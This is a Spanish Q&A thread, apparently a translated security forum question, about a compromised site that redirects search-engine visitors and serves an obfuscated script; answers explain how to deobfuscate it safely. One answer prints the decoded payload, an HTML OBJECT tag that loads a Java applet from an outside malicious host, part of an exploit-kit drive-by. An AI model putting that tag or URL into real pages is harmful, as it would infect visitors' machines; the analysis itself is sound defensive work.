Identifique el código que se está ejecutando en el sitio web

Navega tus respuestas
2

Normalmente no trato con los problemas de seguridad de Internet, pero este me tiene interesado.

El problema está relacionado con un sitio específico, por ejemplo, example.com y cómo lo visitó.

Si la dirección se escribe directamente en el navegador, el sitio web funciona bien.

Si la dirección se busca en google / bing / yahoo y se sigue, se otorga una redirección 302 que conduce a: un sitio de apuestas, una página de error o una página web que solo contiene un script codificado.

Mi pregunta aquí es, ¿cómo puedo identificar lo que está haciendo este script?

El script capturado se puede encontrar en la siguiente bandeja de pegado. enlace

    
pregunta Danial Wayne 22.05.2013 - 00:55
fuente

2 respuestas

4

Puede reemplazar cuidadosamente las llamadas y propiedades inseguras como eval y innerHTML y luego ejecutar el script. Para estar seguro, desactive todos los complementos del navegador. Para estar más seguro, puedes hacer esto en una máquina virtual.

He hecho esto para tu archivo particular. Sucede lo siguiente:

  1. Un archivo Java se carga usando <OBJECT CLASSID="clsid:5852F5ED-8BF4-11D4-A245-080C6F74284" width="1" height="1"><PARAM name="app" value="http://fjetymxvbndyz.bounceme.net/fine/beliees_rights.php?jnlp=b00725b396"/></OBJECT>

  2. Este script está cargado. Es una biblioteca de detección de versiones de complementos del navegador con una carga útil que comprueba la versión y carga diferentes archivos según los complementos. Aquí es una versión mejorada sin la biblioteca.

respondido por el copy 22.05.2013 - 01:48
fuente
0

Parece que el Javascript que estás viendo está ofuscado. Esta es una práctica general si no quiere que sus usuarios sepan lo que está haciendo su script. Mi conjetura es que puede estar mirando el encabezado referido y si es de alguno de esos sitios que usted dice, simplemente lo redirige. Esto debería hacerse idealmente en el lado del servidor, pero incluso así es bastante trivial superar y pasar a la página correcta.

    
respondido por el sudhacker 22.05.2013 - 01:21
fuente

Lea otras preguntas en las etiquetas

¿Es posible limitar las conexiones del servidor a los clientes con un certificado específico? filtrado en Irán